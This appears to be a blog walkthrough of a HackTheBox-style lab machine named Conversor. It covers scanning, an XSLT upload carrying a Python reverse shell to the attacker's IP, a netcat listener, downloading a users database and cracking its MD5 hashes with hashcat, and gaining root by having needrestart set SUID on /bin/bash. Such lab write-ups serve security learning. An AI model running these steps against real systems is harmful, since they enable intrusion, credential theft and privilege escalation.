Command: nmap -A -Pn 10.10.11.92
Command: dirbuster -u http://conversor.htb
My list is present on the path “/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt“, which you have to select on the GUI after clicking on Browse, once selected, click on start
http://conversor.htb/login, http://conversor.htb/register
Command: nano abc.xslt to upload the file
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.1X.XX",3333)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) subprocess.call(["/bin/bash","-i"])
Upload any .xml and the XSLT.xsl (in my case) file with your IP address and Port Number on the Website
Hit on convert and start your listener.
Command: nc -lvnp 3333
now cd to conversor.htb/instance
Command: python3 -m http.server 8080
Wherever you want to download cd there, and run the following
Command: wget http://10.10.11.92:8080/users.db
Commands: –
sqlite3 users.db
sqlite> .tables
sqlite> SELECT * FROM users;
Command: nano hashes.txt
5b5c3ac3a1c897c94caad48e6c71fdec(fismathack)d77e52c972dd92c6fa6934ab5641d10c(aso)
Command: hashcat -m 0 -a 0 hash.txt /home/kali/Desktop/wordlists/rockyou.txt/rockyou.txt
5b5c3ac3a1c897c94caad48e6c71fdec:Keepme****andwarm
Command: ssh fismathack@10.10.11.92, and you know the password
Command: cat user.txt
Root Flag
Command: echo ‘system(“chmod +s /bin/bash”);’ > pwn.sh
Command: sudo /usr/sbin/needrestart -c pwn.sh
Command: /bin/bash -p
Command: whoami
You know the drill!
Leave a Reply